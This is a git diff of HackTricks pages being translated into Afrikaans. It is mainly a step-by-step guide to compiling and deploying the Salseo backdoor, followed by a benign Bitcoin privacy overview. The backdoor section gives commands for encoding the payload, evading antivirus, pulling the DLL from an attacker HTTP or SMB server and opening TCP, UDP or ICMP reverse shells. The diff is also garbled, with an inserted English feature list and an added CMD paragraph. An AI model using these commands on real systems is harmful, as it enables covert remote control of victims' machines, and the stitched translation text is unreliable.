-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
- - diff --git a/backdoors/salseo.md b/backdoors/salseo.md index b50c8851b..13fb06d40 100644 --- a/backdoors/salseo.md +++ b/backdoors/salseo.md @@ -2,171 +2,182 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Compiling the binaries +## Kompilering van die binnerwerke -Download the source code from the github and compile **EvilSalsa** and **SalseoLoader**. You will need **Visual Studio** installed to compile the code. +Laai die bronkode van die github af en kompileer **EvilSalsa** en **SalseoLoader**. Jy sal **Visual Studio** geïnstalleer moet hê om die kode te kompileer. -Compile those projects for the architecture of the windows box where your are going to use them(If the Windows supports x64 compile them for that architectures). +Kompileer hierdie projekte vir die argitektuur van die Windows-boks waar jy dit gaan gebruik (As die Windows x64 ondersteun, kompileer dit vir daardie argitekture). -You can **select the architecture** inside Visual Studio in the **left "Build" Tab** in **"Platform Target".** +Jy kan die argitektuur **kies** binne Visual Studio in die **linker "Build" Tab** in **"Platform Target".** -(\*\*If you can't find this options press in **"Project Tab"** and then in **"\ Properties"**) +(\*\*As jy hierdie opsies nie kan vind nie, druk op **"Project Tab"** en dan op **"\ Properties"**) ![](<../.gitbook/assets/image (132).png>) -Then, build both projects (Build -> Build Solution) (Inside the logs will appear the path of the executable): +Bou dan beide projekte (Build -> Build Solution) (Binne die logs sal die pad van die uitvoerbare lêer verskyn): ![](<../.gitbook/assets/image (1) (2) (1) (1) (1).png>) -## Prepare the Backdoor +## Berei die agterdeur voor -First of all, you will need to encode the **EvilSalsa.dll.** To do so, you can use the python script **encrypterassembly.py** or you can compile the project **EncrypterAssembly**: +Eerstens sal jy die **EvilSalsa.dll** moet enkodeer. Jy kan die Python-skripsie **encrypterassembly.py** gebruik of jy kan die projek **EncrypterAssembly** kompileer: ### **Python** - ``` python EncrypterAssembly/encrypterassembly.py python EncrypterAssembly/encrypterassembly.py EvilSalsax.dll password evilsalsa.dll.txt ``` - ### Windows +#### Salseo + +Salseo is a backdoor that allows remote access to a compromised Windows system. It is commonly used by attackers to maintain persistence and control over the compromised system. + +##### Features + +- **Remote Access**: Salseo provides remote access to the compromised system, allowing the attacker to execute commands and interact with the system. +- **Persistence**: Salseo is designed to maintain persistence on the compromised system, ensuring that the attacker can regain access even after system reboots. +- **Stealth**: Salseo is designed to operate stealthily, avoiding detection by antivirus software and other security measures. +- **Command Execution**: Salseo allows the attacker to execute arbitrary commands on the compromised system, giving them full control over the system. +- **File Transfer**: Salseo supports file transfer between the attacker's system and the compromised system, allowing the attacker to exfiltrate data or upload additional tools. +- **Keylogging**: Salseo can be configured to log keystrokes on the compromised system, allowing the attacker to capture sensitive information such as passwords. +- **Screenshot Capture**: Salseo can capture screenshots of the compromised system, providing the attacker with visual information about the system's activities. +- **Network Communication**: Salseo communicates with the attacker's system over the network, enabling remote control and data exfiltration. + +##### Detection and Mitigation + +- **Antivirus Software**: Keep your antivirus software up to date to detect and remove known instances of Salseo. +- **Network Monitoring**: Monitor network traffic for suspicious activity, such as connections to known malicious IP addresses or unusual data transfers. +- **System Hardening**: Implement security best practices, such as disabling unnecessary services, applying patches and updates, and using strong passwords. +- **Behavioral Analysis**: Use behavioral analysis tools to detect abnormal system behavior that may indicate the presence of Salseo. +- **Firewall**: Configure a firewall to block incoming and outgoing connections to known malicious IP addresses or suspicious domains. +- **User Education**: Educate users about the risks of opening suspicious email attachments or clicking on malicious links, as these are common infection vectors for Salseo. + +##### Conclusion + +Salseo is a powerful backdoor that provides attackers with remote access and control over compromised Windows systems. Detecting and mitigating Salseo requires a combination of proactive security measures, such as antivirus software, network monitoring, system hardening, behavioral analysis, firewall configuration, and user education. By implementing these measures, you can significantly reduce the risk of Salseo infection and protect your systems from unauthorized access. ``` EncrypterAssembly.exe EncrypterAssembly.exe EvilSalsax.dll password evilsalsa.dll.txt ``` +Ok, nou het jy alles wat jy nodig het om die hele Salseo ding uit te voer: die **gekodeerde EvilDalsa.dll** en die **binêre van SalseoLoader.** -Ok, now you have everything you need to execute all the Salseo thing: the **encoded EvilDalsa.dll** and the **binary of SalseoLoader.** +**Laai die SalseoLoader.exe binêre na die masjien op. Dit behoort nie deur enige AV opgespoor te word nie...** -**Upload the SalseoLoader.exe binary to the machine. They shouldn't be detected by any AV...** +## **Voer die agterdeur uit** -## **Execute the backdoor** - -### **Getting a TCP reverse shell (downloading encoded dll through HTTP)** - -Remember to start a nc as the reverse shell listener and a HTTP server to serve the encoded evilsalsa. +### **Kry 'n TCP-omgekeerde skulp (deur die gekodeerde dll af te laai deur HTTP)** +Onthou om 'n nc as die omgekeerde skulp luisteraar te begin en 'n HTTP-bediener om die gekodeerde evilsalsa te bedien. ``` SalseoLoader.exe password http:///evilsalsa.dll.txt reversetcp ``` +### **Kry 'n UDP omgekeerde dop (laai gekodeerde dll af deur SMB)** -### **Getting a UDP reverse shell (downloading encoded dll through SMB)** - -Remember to start a nc as the reverse shell listener, and a SMB server to serve the encoded evilsalsa (impacket-smbserver). - +Onthou om 'n nc as die omgekeerde dop luisteraar te begin, en 'n SMB-bediener om die gekodeerde evilsalsa te dien (impacket-smbserver). ``` SalseoLoader.exe password \\/folder/evilsalsa.dll.txt reverseudp ``` +### **Kry 'n ICMP omgekeerde dop (geënkripteerde dll reeds binne die slagoffer)** -### **Getting a ICMP reverse shell (encoded dll already inside the victim)** - -**This time you need a special tool in the client to receive the reverse shell. Download:** [**https://github.com/inquisb/icmpsh**](https://github.com/inquisb/icmpsh) - -#### **Disable ICMP Replies:** +**Hierdie keer het jy 'n spesiale instrument in die kliënt nodig om die omgekeerde dop te ontvang. Laai af:** [**https://github.com/inquisb/icmpsh**](https://github.com/inquisb/icmpsh) +#### **Deaktiveer ICMP Antwoorde:** ``` sysctl -w net.ipv4.icmp_echo_ignore_all=1 #You finish, you can enable it again running: sysctl -w net.ipv4.icmp_echo_ignore_all=0 ``` - -#### Execute the client: - +#### Voer die kliënt uit: ``` python icmpsh_m.py "" "" ``` - -#### Inside the victim, lets execute the salseo thing: - +#### Binne die slagoffer, laat ons die salseo ding uitvoer: ``` SalseoLoader.exe password C:/Path/to/evilsalsa.dll.txt reverseicmp ``` +## Kompilering van SalseoLoader as DLL wat die hooffunksie uitvoer -## Compiling SalseoLoader as DLL exporting main function +Maak die SalseoLoader-projek oop met behulp van Visual Studio. -Open the SalseoLoader project using Visual Studio. - -### Add before the main function: \[DllExport] +### Voeg voor die hooffunksie by: \[DllExport] ![](<../.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>) -### Install DllExport for this project +### Installeer DllExport vir hierdie projek #### **Tools** --> **NuGet Package Manager** --> **Manage NuGet Packages for Solution...** ![](<../.gitbook/assets/image (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>) -#### **Search for DllExport package (using Browse tab), and press Install (and accept the popup)** +#### **Soek na die DllExport-pakket (deur die Browse-tabblad te gebruik) en druk op Installeer (en aanvaar die popup)** ![](<../.gitbook/assets/image (4) (1) (1) (1) (1) (1) (1) (1) (1).png>) -In your project folder have appeared the files: **DllExport.bat** and **DllExport\_Configure.bat** +In jou projeklêer het die lêers verskyn: **DllExport.bat** en **DllExport\_Configure.bat** -### **U**ninstall DllExport +### **D**eïnstalleer DllExport -Press **Uninstall** (yeah, its weird but trust me, it is necessary) +Druk **Deïnstalleer** (ja, dit is vreemd, maar glo my, dit is nodig) ![](<../.gitbook/assets/image (5) (1) (1) (2) (1).png>) -### **Exit Visual Studio and execute DllExport\_configure** +### **Sluit Visual Studio af en voer DllExport\_configure uit** -Just **exit** Visual Studio +Sluit eenvoudig Visual Studio af -Then, go to your **SalseoLoader folder** and **execute DllExport\_Configure.bat** +Gaan dan na jou **SalseoLoader-lêer** en **voer DllExport\_Configure.bat uit** -Select **x64** (if you are going to use it inside a x64 box, that was my case), select **System.Runtime.InteropServices** (inside **Namespace for DllExport**) and press **Apply** +Kies **x64** (as jy dit binne 'n x64-boks gaan gebruik, dit was my geval), kies **System.Runtime.InteropServices** (binne **Namespace for DllExport**) en druk op **Apply** ![](<../.gitbook/assets/image (7) (1) (1) (1) (1).png>) -### **Open the project again with visual Studio** +### **Maak die projek weer oop met Visual Studio** -**\[DllExport]** should not be longer marked as error +**\[DllExport]** behoort nie meer as 'n fout gemerk te wees nie ![](<../.gitbook/assets/image (8) (1).png>) -### Build the solution +### Bou die oplossing -Select **Output Type = Class Library** (Project --> SalseoLoader Properties --> Application --> Output type = Class Library) +Kies **Output Type = Class Library** (Project --> SalseoLoader Properties --> Application --> Output type = Class Library) ![](<../.gitbook/assets/image (10) (1).png>) -Select **x64** **platform** (Project --> SalseoLoader Properties --> Build --> Platform target = x64) +Kies **x64-platform** (Project --> SalseoLoader Properties --> Build --> Platform target = x64) ![](<../.gitbook/assets/image (9) (1) (1).png>) -To **build** the solution: Build --> Build Solution (Inside the Output console the path of the new DLL will appear) +Om die oplossing te **bou**: Build --> Build Solution (Die pad van die nuwe DLL sal in die Uitvoerkonsole verskyn) -### Test the generated Dll +### Toets die gegenereerde Dll -Copy and paste the Dll where you want to test it. - -Execute: +Kopieer en plak die Dll waar jy dit wil toets. +Voer uit: ``` rundll32.exe SalseoLoader.dll,main ``` +As geen fout verskyn nie, het jy waarskynlik 'n funksionele DLL!! -If no error appears, probably you have a functional DLL!! +## Kry 'n skul gebruik die DLL -## Get a shell using the DLL - -Don't forget to use a **HTTP** **server** and set a **nc** **listener** +Moenie vergeet om 'n **HTTP** **bediener** te gebruik en 'n **nc** **luisteraar** in te stel ### Powershell - ``` $env:pass="password" $env:payload="http://10.2.0.5/evilsalsax64.dll.txt" @@ -175,9 +186,9 @@ $env:lport="1337" $env:shell="reversetcp" rundll32.exe SalseoLoader.dll,main ``` - ### CMD +CMD (Command Prompt) is 'n opdraggewer wat beskikbaar is op Windows-bedryfstelsels. Dit bied 'n gebruikersvriendelike omgewing waarin gebruikers opdragte kan uitvoer om verskeie take uit te voer. Hierdie opdragte kan gebruik word om sagteware te installeer, lêers te skep en te wysig, netwerkverbindings te bestuur en vele ander funksies uit te voer. CMD is 'n kragtige hulpmiddel wat deur hackers gebruik kan word om toegang tot 'n stelsel te verkry en verskeie aanvalle uit te voer. ``` set pass=password set payload=http://10.2.0.5/evilsalsax64.dll.txt @@ -186,17 +197,16 @@ set lport=1337 set shell=reversetcp rundll32.exe SalseoLoader.dll,main ``` -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
diff --git a/blockchain/blockchain-and-crypto-currencies/README.md b/blockchain/blockchain-and-crypto-currencies/README.md index 988b051e5..a55e7badd 100644 --- a/blockchain/blockchain-and-crypto-currencies/README.md +++ b/blockchain/blockchain-and-crypto-currencies/README.md @@ -1,195 +1,189 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Basic Concepts +## Basiese Konsepte -- **Smart Contracts** are defined as programs that execute on a blockchain when certain conditions are met, automating agreement executions without intermediaries. -- **Decentralized Applications (dApps)** build upon smart contracts, featuring a user-friendly front-end and a transparent, auditable back-end. -- **Tokens & Coins** differentiate where coins serve as digital money, while tokens represent value or ownership in specific contexts. - - **Utility Tokens** grant access to services, and **Security Tokens** signify asset ownership. -- **DeFi** stands for Decentralized Finance, offering financial services without central authorities. -- **DEX** and **DAOs** refer to Decentralized Exchange Platforms and Decentralized Autonomous Organizations, respectively. +- **Slim Kontrakte** word gedefinieer as programme wat op 'n blokketting uitgevoer word wanneer sekere voorwaardes voldoen word, wat ooreenkomste outomaties sonder tussenpersone uitvoer. +- **Gedentraliseerde Toepassings (dApps)** bou op slim kontrakte, met 'n gebruikersvriendelike voorkant en 'n deursigtige, auditeerbare agterkant. +- **Tokens & Munte** onderskei waar munte as digitale geld dien, terwyl tokens waarde of eienaarskap in spesifieke kontekste verteenwoordig. +- **Hulpmiddel-Tokens** gee toegang tot dienste, en **Sekuriteits-Tokens** dui bateseienaarskap aan. +- **DeFi** staan vir Gedentraliseerde Finansies en bied finansiële dienste sonder sentrale owerhede. +- **DEX** en **DAO's** verwys onderskeidelik na Gedentraliseerde Ruilplatforms en Gedentraliseerde Outonome Organisasies. -## Consensus Mechanisms +## Konsensusmeganismes -Consensus mechanisms ensure secure and agreed transaction validations on the blockchain: -- **Proof of Work (PoW)** relies on computational power for transaction verification. -- **Proof of Stake (PoS)** demands validators to hold a certain amount of tokens, reducing energy consumption compared to PoW. +Konsensusmeganismes verseker veilige en ooreengekome transaksievalidasies op die blokketting: +- **Bewys van Werk (PoW)** steun op rekenaarvermoë vir transaksieverifikasie. +- **Bewys van Aandeel (PoS)** vereis dat valideerders 'n sekere hoeveelheid tokens besit, wat energieverbruik verminder in vergelyking met PoW. -## Bitcoin Essentials +## Bitcoin Essensies -### Transactions +### Transaksies -Bitcoin transactions involve transferring funds between addresses. Transactions are validated through digital signatures, ensuring only the owner of the private key can initiate transfers. +Bitcoin-transaksies behels die oordra van fondse tussen adresse. Transaksies word deur digitale handtekeninge gevalideer, wat verseker dat slegs die eienaar van die privaat sleutel oordragte kan inisieer. -#### Key Components: +#### Sleutelkomponente: -- **Multisignature Transactions** require multiple signatures to authorize a transaction. -- Transactions consist of **inputs** (source of funds), **outputs** (destination), **fees** (paid to miners), and **scripts** (transaction rules). +- **Multisignature-transaksies** vereis meervoudige handtekeninge om 'n transaksie te magtig. +- Transaksies bestaan uit **inskrywings** (bron van fondse), **uitsette** (bestemming), **fooie** (betaal aan myners) en **skripsies** (transaksiereëls). -### Lightning Network +### Lightning-netwerk -Aims to enhance Bitcoin's scalability by allowing multiple transactions within a channel, only broadcasting the final state to the blockchain. +Beoog om die skaalbaarheid van Bitcoin te verbeter deur meervoudige transaksies binne 'n kanaal toe te laat, en slegs die finale toestand na die blokketting uit te saai. -## Bitcoin Privacy Concerns +## Bitcoin-privasiemetodes -Privacy attacks, such as **Common Input Ownership** and **UTXO Change Address Detection**, exploit transaction patterns. Strategies like **Mixers** and **CoinJoin** improve anonymity by obscuring transaction links between users. +Privasiemetodes, soos **Gemeenskaplike Invoereienaarskap** en **UTXO-veranderingsadresopsporing**, maak gebruik van transaksiepatrone. Strategieë soos **Mengers** en **CoinJoin** verbeter anonimiteit deur transaksieskakels tussen gebruikers te verdoesel. -## Acquiring Bitcoins Anonymously +## Anonieme verkryging van Bitcoins -Methods include cash trades, mining, and using mixers. **CoinJoin** mixes multiple transactions to complicate traceability, while **PayJoin** disguises CoinJoins as regular transactions for heightened privacy. +Metodes sluit kontanttransaksies, mynbou en die gebruik van mengers in. **CoinJoin** meng verskeie transaksies om spoorbaarheid te bemoeilik, terwyl **PayJoin** CoinJoins as gewone transaksies vermom vir verhoogde privaatheid. -# Bitcoin Privacy Atacks +# Bitcoin-privasiemetodes -# Summary of Bitcoin Privacy Attacks +# Opsomming van Bitcoin-privasiemetodes -In the world of Bitcoin, the privacy of transactions and the anonymity of users are often subjects of concern. Here's a simplified overview of several common methods through which attackers can compromise Bitcoin privacy. +In die wêreld van Bitcoin is die privaatheid van transaksies en die anonimiteit van gebruikers dikwels onderwerp van kommer. Hier is 'n vereenvoudigde oorsig van verskeie algemene metodes waarmee aanvallers Bitcoin-privasie kan benadeel. -## **Common Input Ownership Assumption** +## **Gemeenskaplike Invoereienaarskap-aanname** -It is generally rare for inputs from different users to be combined in a single transaction due to the complexity involved. Thus, **two input addresses in the same transaction are often assumed to belong to the same owner**. +Dit is oor die algemeen selde dat invoere van verskillende gebruikers in 'n enkele transaksie gekombineer word as gevolg van die betrokkenheid van kompleksiteit. Dus word **twee invoeradresse in dieselfde transaksie dikwels aan dieselfde eienaar toegeskryf**. -## **UTXO Change Address Detection** +## **UTXO-veranderingsadresopsporing** -A UTXO, or **Unspent Transaction Output**, must be entirely spent in a transaction. If only a part of it is sent to another address, the remainder goes to a new change address. Observers can assume this new address belongs to the sender, compromising privacy. +'n UTXO, of **Ongebruikte Transaksie-uitset**, moet heeltemal in 'n transaksie spandeer word. As slegs 'n deel daarvan na 'n ander adres gestuur word, gaan die res na 'n nuwe veranderingsadres. Waarnemers kan aanneem dat hierdie nuwe adres aan die sender behoort, wat privaatheid benadeel. -### Example -To mitigate this, mixing services or using multiple addresses can help obscure ownership. +### Voorbeeld +Om dit te verminder, kan mengdienste of die gebruik van verskeie adresse help om eienaarskap te verdoesel. -## **Social Networks & Forums Exposure** +## **Sosiale Netwerke & Forum Blootstelling** -Users sometimes share their Bitcoin addresses online, making it **easy to link the address to its owner**. +Gebruikers deel soms hul Bitcoin-adresse aanlyn, wat dit **maklik maak om die adres aan sy eienaar te koppel**. -## **Transaction Graph Analysis** +## **Transaksiegrafiekontleding** -Transactions can be visualized as graphs, revealing potential connections between users based on the flow of funds. +Transaksies kan as grafieke voorgestel word, wat potensiële verbindings tussen gebruikers onthul op grond van die vloei van fondse. -## **Unnecessary Input Heuristic (Optimal Change Heuristic)** +## **Onnodige Invoerheuristiek (Optimale Veranderingsheuristiek)** -This heuristic is based on analyzing transactions with multiple inputs and outputs to guess which output is the change returning to the sender. - -### Example +Hierdie heuristiek is gebaseer op die analise van transaksies met meervoudige invoere en uitsette om te raai watter uitset die verandering is wat na die sender terugkeer. +### Voorbeeld ```bash 2 btc --> 4 btc 3 btc 1 btc ``` +Indien die toevoeging van meer insette die uitset groter maak as enige enkele inset, kan dit die heuristiek in die war bring. -If adding more inputs makes the change output larger than any single input, it can confuse the heuristic. +## **Gedwonge Adres Hergebruik** -## **Forced Address Reuse** +Aanvallers kan klein bedrae na voorheen gebruikte adresse stuur, in die hoop dat die ontvanger dit saam met ander insette in toekomstige transaksies gebruik, en sodoende adresse aan mekaar koppel. -Attackers may send small amounts to previously used addresses, hoping the recipient combines these with other inputs in future transactions, thereby linking addresses together. +### Korrekte Beursiegedrag +Beursies moet voorkom dat munte ontvang op reeds gebruikte, leë adresse om hierdie privaatheidslek te voorkom. -### Correct Wallet Behavior -Wallets should avoid using coins received on already used, empty addresses to prevent this privacy leak. +## **Ander Blockchain Analise Tegnieke** -## **Other Blockchain Analysis Techniques** +- **Presiese Betalingsbedrae:** Transaksies sonder wisselgeld is waarskynlik tussen twee adresse wat deur dieselfde gebruiker besit word. +- **Ronde Getalle:** 'n Ronde getal in 'n transaksie dui daarop dat dit 'n betaling is, met die nie-ronde uitset wat waarskynlik die wisselgeld is. +- **Beursie Vingerafdrukke:** Verskillende beursies het unieke transaksie-skeppingspatrone, wat analiste in staat stel om die gebruikte sagteware en moontlik die wisselgeldadres te identifiseer. +- **Bedrag & Tydsverbande:** Die bekendmaking van transaksie-tye of -bedrae kan transaksies naspeurbaar maak. -- **Exact Payment Amounts:** Transactions without change are likely between two addresses owned by the same user. -- **Round Numbers:** A round number in a transaction suggests it's a payment, with the non-round output likely being the change. -- **Wallet Fingerprinting:** Different wallets have unique transaction creation patterns, allowing analysts to identify the software used and potentially the change address. -- **Amount & Timing Correlations:** Disclosing transaction times or amounts can make transactions traceable. +## **Verkeersanalise** -## **Traffic Analysis** +Deur netwerkverkeer te monitor, kan aanvallers moontlik transaksies of blokke aan IP-adresse koppel, wat die privaatheid van gebruikers in gevaar kan bring. Dit is veral waar as 'n entiteit baie Bitcoin-nodes bedryf, wat hul vermoë om transaksies te monitor verbeter. -By monitoring network traffic, attackers can potentially link transactions or blocks to IP addresses, compromising user privacy. This is especially true if an entity operates many Bitcoin nodes, enhancing their ability to monitor transactions. - -## More -For a comprehensive list of privacy attacks and defenses, visit [Bitcoin Privacy on Bitcoin Wiki](https://en.bitcoin.it/wiki/Privacy). +## Meer +Vir 'n omvattende lys van privaatheidsaanvalle en verdedigings, besoek [Bitcoin Privacy op Bitcoin Wiki](https://en.bitcoin.it/wiki/Privacy). -# Anonymous Bitcoin Transactions +# Anonieme Bitcoin Transaksies -## Ways to Get Bitcoins Anonymously +## Maniere om Bitcoins Anoniem te Kry -- **Cash Transactions**: Acquiring bitcoin through cash. -- **Cash Alternatives**: Purchasing gift cards and exchanging them online for bitcoin. -- **Mining**: The most private method to earn bitcoins is through mining, especially when done alone because mining pools may know the miner's IP address. [Mining Pools Information](https://en.bitcoin.it/wiki/Pooled_mining) -- **Theft**: Theoretically, stealing bitcoin could be another method to acquire it anonymously, although it's illegal and not recommended. +- **Kontant Transaksies**: Bitcoin verkry deur kontant. +- **Alternatiewe Kontant**: Aankoop van geskenkkaarte en dit aanlyn ruil vir bitcoin. +- **Mynbou**: Die mees private metode om bitcoins te verdien is deur mynbou, veral wanneer dit alleen gedoen word, omdat mynbou-poele die IP-adres van die mynwerker kan weet. [Mynbou-poele-inligting](https://en.bitcoin.it/wiki/Pooled_mining) +- **Diefstal**: Teoreties kan die steel van bitcoin 'n ander metode wees om dit anoniem te bekom, alhoewel dit onwettig en nie aanbeveel word nie. -## Mixing Services +## Mengdienste -By using a mixing service, a user can **send bitcoins** and receive **different bitcoins in return**, which makes tracing the original owner difficult. Yet, this requires trust in the service not to keep logs and to actually return the bitcoins. Alternative mixing options include Bitcoin casinos. +Deur 'n mengdiens te gebruik, kan 'n gebruiker **bitcoins stuur** en **verskillende bitcoins in ruil ontvang**, wat dit moeilik maak om die oorspronklike eienaar op te spoor. Dit vereis egter vertroue in die diens om nie logboeke te hou en om die bitcoins werklik terug te gee. Alternatiewe mengopsies sluit Bitcoin-casinos in. ## CoinJoin -**CoinJoin** merges multiple transactions from different users into one, complicating the process for anyone trying to match inputs with outputs. Despite its effectiveness, transactions with unique input and output sizes can still potentially be traced. +**CoinJoin** voeg verskeie transaksies van verskillende gebruikers saam in een, wat die proses vir enigeen wat probeer om insette met uitsette te koppel, bemoeilik. Ten spyte van sy doeltreffendheid kan transaksies met unieke inset- en uitsetgroottes steeds potensieel nagespoor word. -Example transactions that may have used CoinJoin include `402d3e1df685d1fdf82f36b220079c1bf44db227df2d676625ebcbee3f6cb22a` and `85378815f6ee170aa8c26694ee2df42b99cff7fa9357f073c1192fff1f540238`. +Voorbeeldtransaksies wat moontlik CoinJoin gebruik het, sluit in `402d3e1df685d1fdf82f36b220079c1bf44db227df2d676625ebcbee3f6cb22a` en `85378815f6ee170aa8c26694ee2df42b99cff7fa9357f073c1192fff1f540238`. -For more information, visit [CoinJoin](https://coinjoin.io/en). For a similar service on Ethereum, check out [Tornado Cash](https://tornado.cash), which anonymizes transactions with funds from miners. +Vir meer inligting, besoek [CoinJoin](https://coinjoin.io/en). Vir 'n soortgelyke diens op Ethereum, kyk na [Tornado Cash](https://tornado.cash), wat transaksies anonimiseer met fondse van mynwerkers. ## PayJoin -A variant of CoinJoin, **PayJoin** (or P2EP), disguises the transaction among two parties (e.g., a customer and a merchant) as a regular transaction, without the distinctive equal outputs characteristic of CoinJoin. This makes it extremely hard to detect and could invalidate the common-input-ownership heuristic used by transaction surveillance entities. - +'n Variasie van CoinJoin, **PayJoin** (of P2EP), vermom die 